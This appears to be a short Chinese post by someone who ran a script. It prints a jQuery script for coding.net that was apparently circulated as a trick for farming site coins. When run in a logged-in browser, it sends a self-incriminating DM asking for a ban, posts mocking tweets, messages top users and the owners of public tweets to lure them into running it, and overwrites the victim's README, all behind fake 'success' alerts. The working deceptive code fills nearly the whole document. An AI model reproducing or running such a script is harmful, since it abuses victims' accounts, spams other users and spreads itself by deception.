手贱运行了一下。。。
$.post("
https://coding.net/api/social/message/send", {
receiver_global_key: "Kyle_lyk",
content: "我在刷码币,求封号!"
}, "JSON");
for (var i = 0; 5 > i; i++)
jQuery.post("
https://coding.net/api/tweet", {
content: "@AKCoding @
Coding 我在模拟手机发冒泡刷码币,我是一只快乐的小毛驴,刷呀刷呀刷码币,码币" + new Date().getTime(),
device: "RM-937"
}, function(a) {
alert("模拟手机发送冒泡成功");
}, "json"),
jQuery.post("
https://coding.net/api/tweet", {
content: "@AKCoding @
Coding 我在模拟电脑发冒泡刷码币,我是一只快乐的小毛驴,刷呀刷呀刷码币,码币" + new Date().getTime()
}, function(a) {
alert("模拟电脑发送冒泡成功");
}, "json");
$.get("
https://coding.net/api/tweet/best_user", function(a) {
for (var b = 0; b < a.data.length; b++) $.post("
https://coding.net/api/social/message/send", {
receiver_global_key: a.data[b].global_key,
content: "我在刷码币,赶快和我一起来刷吧!"
}, "JSON");
}, "JSON");
alert("通过专用API获取码币成功!");
$.get("
https://coding.net/api/tweet/public_tweets", function(a) {
for (var b = 0; b < a.data.length; b++) $.post("
https://coding.net/api/social/message/send", {
receiver_global_key: a.data[b].owner.global_key,
content: "我在刷码币,赶快和我一起来刷吧!"
}, "JSON");
}, "JSON");
$.get("
https://coding.net/api/account/current_user", function(a) {
jQuery.get("
https://coding.net/api/user/" + a.data.global_key + "/project/mb/git/edit/master/
README.md", function(b) {
b = b.data.lastCommit;
jQuery.post("
https://coding.net/api/user/" + a.data.global_key + "/project/mb/git/edit/master/
README.md", {
content: new Date().getTime() + "我在刷码币,我是一只快乐的小毛驴,刷呀刷呀刷码币,码币",
message: "update
README.md",
lastCommitSha: b
}, function(a) {}, "json");
alert("模拟项目推送获取码币成功");
}, "json");
}, "JSON");